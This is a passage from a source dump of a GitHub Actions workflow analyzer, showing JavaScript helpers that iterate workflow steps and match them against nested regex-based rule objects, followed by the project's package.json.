Object.keys(yamlContent.jobs)) { 116 | const job = yamlContent.jobs[jobKey]; 117 | if (job.hasOwnProperty('steps') && Array.isArray(job.steps)) { 118 | for (const [stepidx, step] of job.steps.entries()) { 119 | if (step) yield [jobKey, job, step, stepidx] 120 | } 121 | } 122 | } 123 | } 124 | 125 | if (yamlContent?.runs) { 126 | if (Array.isArray(yamlContent.runs?.steps)) { 127 | const steps = yamlContent.runs.steps 128 | for (const [stepidx, step] of steps.entries()) { 129 | if (step) yield [yamlContent.name, step, step, stepidx] 130 | } 131 | } 132 | } 133 | } 134 | 135 | function recursiveMatcher(rule, input) { 136 | if (rule instanceof RegExp) { 137 | rule.lastIndex = 0; 138 | return rule.exec(input) === null ? false : true; 139 | } else if (rule instanceof Object) { 140 | let result = []; 141 | for (const [key, value] of Object.entries(rule)) { 142 | if (key == "*") { 143 | result.push(Object.values(input).some( 144 | inputvalue => recursiveMatcher(value, inputvalue) 145 | )) 146 | } else if (input.hasOwnProperty(key)) { 147 | result.push(recursiveMatcher(value, input[key])); 148 | } else if (value === undefined && !input.hasOwnProperty(key)) { 149 | result.push(true) 150 | } else { 151 | result.push(false) 152 | } 153 | } 154 | return result.every(bool => bool) 155 | } else { 156 | return rule === input 157 | } 158 | } 159 | 160 | export function stepMatches(rules, step) { 161 | return rules.filter( 162 | rule => recursiveMatcher(rule, step) 163 | ) 164 | } 165 | 166 | function recursiveEvaluate(rule, step, regexpgroup) { 167 | if (rule instanceof RegExp) { 168 | if (regexpgroup === undefined) return step; 169 | rule.lastIndex = 0; 170 | let output = []; 171 | let match; 172 | 173 | // many matches or just one? 174 | if (rule.flags.includes("g")) { 175 | while (match = rule.exec(step)) { 176 | output.push(match.groups?.[regexpgroup] || match[0]) 177 | } 178 | return output; 179 | } else { 180 | match = rule.exec(step); 181 | return match.groups?.[regexpgroup] || match[0] 182 | } 183 | 184 | } else if (rule instanceof Object) { 185 | let result = {}; 186 | for (const [key, value] of Object.entries(rule)) { 187 | if (key === "*") { 188 | Object.entries(step).forEach(([k, v]) => { 189 | if (recursiveMatcher(value, v)) { 190 | result[k] = recursiveEvaluate(value, v, regexpgroup?.[k] || regexpgroup?.["*"]); 191 | } 192 | }) 193 | } else if (step.hasOwnProperty(key)) { 194 | result[key] = recursiveEvaluate(value, step[key], regexpgroup?.[key] || regexpgroup?.["*"]) 195 | } else { 196 | result[key] = value; 197 | } 198 | } 199 | return result; 200 | } else { 201 | // string or number or something 202 | return step; 203 | } 204 | } 205 | 206 | export function evaluateStepRule(rule, step, regexpgroup = false) { 207 | return recursiveEvaluate(rule, step, regexpgroup); 208 | } 209 | -------------------------------------------------------------------------------- /package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "github-actions-analyzer", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.mjs", 6 | "scripts": { 7 | "test": "node --experimental-vm-modules node_modules/jest/bin/jest.js", 8 | "start": "node index.mjs" 9 | }, 10 | "type": "module", 11 | "keywords": [], 12 | "author": "", 13 | "license": "ISC", 14 | "dependencies": { 15 | "chalk": "^5.3.0", 16 | "commander": "^12.1.0", 17 | "dotenv": "^16.4.1", 18 | "gunzip-maybe": "^1.4.2", 19 | "octokit": "^4.0.2", 20 | "tar-stream": "^3.1.7", 21 | "winston": "^3.13.0", 22 | "yaml": "^2.5.1" 23 | }, 24 | "devDependencies": { 25 | "eslint": "^8.56.0", 26 | "eslint-config-airbnb-base": "^15.0.0", 27 | "eslint-config-standard": "^17.1.0", 28 | "jest": "^29.7.0" 29 | }, 30 | "jest": { 31 | "transform": {} 32 | } 33 | } 34 | --------------------------------------------------------------------------------